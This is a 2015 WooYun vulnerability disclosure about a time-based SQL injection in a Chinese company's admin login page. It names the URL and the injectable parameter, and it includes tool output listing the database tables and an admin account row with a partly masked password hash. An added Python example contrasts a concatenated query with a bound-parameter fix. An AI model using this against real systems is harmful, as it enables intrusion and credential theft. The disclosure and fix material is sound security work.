Vulnerability summary

Defect ID: wooyun-2015-0141629

Title: SQL injection in the Choumei (臭美网) trading backend (admin account password obtained)

Vendor: 深圳市臭美文化传播有限公司 (Shenzhen Choumei Culture Communication Co., Ltd.)

Author: 三浪兄

Submitted: 2015-09-16 18:48

Fixed: 2015-11-01 10:04

Published: 2015-11-01 10:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-16: Details sent to the vendor; awaiting vendor handling
2015-09-17: Vendor confirmed; details disclosed to the vendor only
2015-09-27: Details disclosed to core white hats and relevant domain experts
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

Brief description:

Affects tens of thousands of merchants!!!
...
(That is my guess; does your company even have tens of thousands of merchants???)

Detailed description:

The trading backend http://jiaoyi.choumei.cn/Login/index.html has a time-based (delay) SQL injection in the username parameter.
The admin login password hash has been masked. Oh, masked; please don't ask for it.

漏洞证明:

available databases [3]:
[*] cm_choumeionline
[*] cm_service
[*] information_schema
1
[14:52:12] [INFO] adjusting time delay to 1 second due to good response times
61
[14:52:16] [INFO] retrieved: cm_activity
[14:53:15] [INFO] retrieved: cm_addedserv
[14:54:08] [ERROR] invalid character detected. retrying..
[14:54:08] [WARNING] increasing time delay to 2 seconds
ice
[14:54:31] [INFO] retrieved: cm_addedservice_itemtype
[14:56:36] [INFO] retrieved: cm_addedservice_salon
[14:58:02] [INFO] retrieved: cm_admin_user
[14:59:29] [INFO] retrieved: cm_bounty_activity
[15:02:01] [INFO] retrieved: cm_bounty_comment
[15:03:33] [INFO] retrieved: cm_bounty_friends
[15:05:00] [INFO] retrieved: cm_bounty_order
[15:06:11] [INFO] retrieved: cm_bounty_push
[15:07:18] [INFO] retrieved: cm_bounty_request
[15:08:44] [INFO] retrieved: cm_bounty_task
[15:09:44] [INFO] retrieved: cm_bounty_task_20150907182500
[15:12:32] [INFO] retrieved: cm_business_staf
[15:14:34] [INFO] adjusting time delay to 1 second due to good response times
f
[15:14:39] [INFO] retrieved: cm_category
[15:15:25] [INFO] retrieved: cm_city
[15:15:47] [INFO] retrieved: cm_collect
[15:16:27] [INFO] retrieved: cm_comment_filter
[15:17:41] [INFO] retrieved: cm_commission
[15:18:22] [INFO] retrieved: cm_commission_log
[15:19:04] [INFO] retrieved: cm_company_code
[15:20:02] [INFO] retrieved: cm_company_code_collect
[15:21:05] [INFO] retrieved: cm_company_code_user
[15:21:46] [INFO] retrieved: cm_country
[15:22:23] [INFO] retrieved: cm_coupon
[15:22:51] [INFO] retrieved: cm_coupon_config
[15:23:41] [INFO] retrieved: cm_coupon_info
[15:24:17] [INFO] retrieved: cm_coupon_iphone
[15:25:02] [INFO] retrieved: cm_coupon_order_ticket_temp
[15:26:51] [INFO] retrieved: cm_coupon_statics
[15:27:39] [INFO] retrieved: cm_coupon_temp
[15:28:16] [INFO] retrieved: cm_crm_logs
[15:29:02] [INFO] retrieved: cm_depart
[15:29:43] [ERROR] invalid character detected. retrying..
[15:29:43] [WARNING] increasing time delay to 2 seconds
ments
[15:30:33] [INFO] retrieved: cm_device
[15:31:19] [INFO] retrieved: cm_dispose_order
[15:33:24] [INFO] retrieved: cm_dividend
[15:34:32] [INFO] retrieved: cm_dividend_set
[15:35:37] [INFO] retrieved: cm_event_conf
[15:37:26] [INFO] retrieved: cm_eventbanner
Database: cm_choumeionline
Table: cm_admin_user
[15 columns]
+--------------+----------------------+
| Column | Type |
+--------------+----------------------+
| action_list | text |
| add_time | int(11) |
| agency_id | smallint(5) unsigned |
| ec_salt | varchar(10) |
| email | varchar(60) |
| lang_type | varchar(50) |
| last_ip | varchar(15) |
| last_login | int(11) |
| nav_list | text |
| password | varchar(32) |
| role_id | smallint(5) |
| suppliers_id | smallint(5) unsigned |
| todolist | longtext |
| user_id | smallint(5) unsigned |
| user_name | varchar(60) |
+--------------+----------------------+
Database: cm_choumeionline
Table: cm_admin_user
[1 entry]
+----------------+----------------------------------+---------+-----------+
| email | password | user_id | user_name |
+----------------+----------------------------------+---------+-----------+
| faesf@fsaf.com | 258448ee1a31bb7eb223adc0f0******| 1 | choumei |
+----------------+----------------------------------+---------+-----------+

Fix recommendation:

Mom says: filter the input.

Copyright notice: please credit 三浪兄@乌云 when reposting
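Filtering alone is fragile; the durable fix for the login lookup described above is a bound parameter. The following is an added example, not code from the report or from the vendor's site: it models the admin lookup against a constructed SQLite copy of a few cm_admin_user columns from the dump (user_name, password, ec_salt), with a placeholder password hash. The "before" function concatenates the username into the query the way the vulnerable login apparently did; the "after" function binds it. SQLite has no SLEEP(), so a tautology is used to show that the vulnerable form lets the username rewrite the query while the fixed form treats it as plain data.

```python
import hashlib
import sqlite3

# Constructed schema: a subset of the cm_admin_user columns listed in the report.
SCHEMA = """
CREATE TABLE cm_admin_user (
    user_id   INTEGER PRIMARY KEY,
    user_name VARCHAR(60) NOT NULL,
    password  VARCHAR(32) NOT NULL,
    ec_salt   VARCHAR(10) NOT NULL
);
"""

COLUMNS = "user_id, user_name, password, ec_salt"


def make_db():
    """In-memory DB with one constructed admin row; hash and salt are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    salt = "s4lt"
    # Same shape as the dump: 32-hex-char hash stored next to a short salt.
    pw_hash = hashlib.md5(("placeholder-pass" + salt).encode()).hexdigest()
    conn.execute("INSERT INTO cm_admin_user VALUES (1, 'choumei', ?, ?)", (pw_hash, salt))
    return conn


def login_lookup_vulnerable(conn, username):
    """Before: the username is spliced into the SQL text, so it can alter the query.
    On MySQL the same splice is what makes a delay-based (SLEEP) probe possible."""
    sql = "SELECT %s FROM cm_admin_user WHERE user_name = '%s'" % (COLUMNS, username)
    return conn.execute(sql).fetchone()


def login_lookup_fixed(conn, username):
    """After: bound parameter; the driver sends the username as data, never as SQL."""
    sql = "SELECT %s FROM cm_admin_user WHERE user_name = ?" % COLUMNS
    return conn.execute(sql, (username,)).fetchone()


def verify_password(row, candidate):
    """Check a candidate against the stored md5(password + ec_salt)."""
    if row is None:
        return False
    _user_id, _name, stored_hash, salt = row
    return hashlib.md5((candidate + salt).encode()).hexdigest() == stored_hash
```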


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-09-17 10:02

Vendor reply:

Being handled.

Latest status:

None yet


Vulnerability review:

Comments

  1. 2015-09-17 17:29 | 三浪兄 (Intern white hat | Rank: 46, vulnerabilities: 13 | I am a singer-songwriter.)

    The vendor response says 15 rank, so why was I actually given only 4 rank???